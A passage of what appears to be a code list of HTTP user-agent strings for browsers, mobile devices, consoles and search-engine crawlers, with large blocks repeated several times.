'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
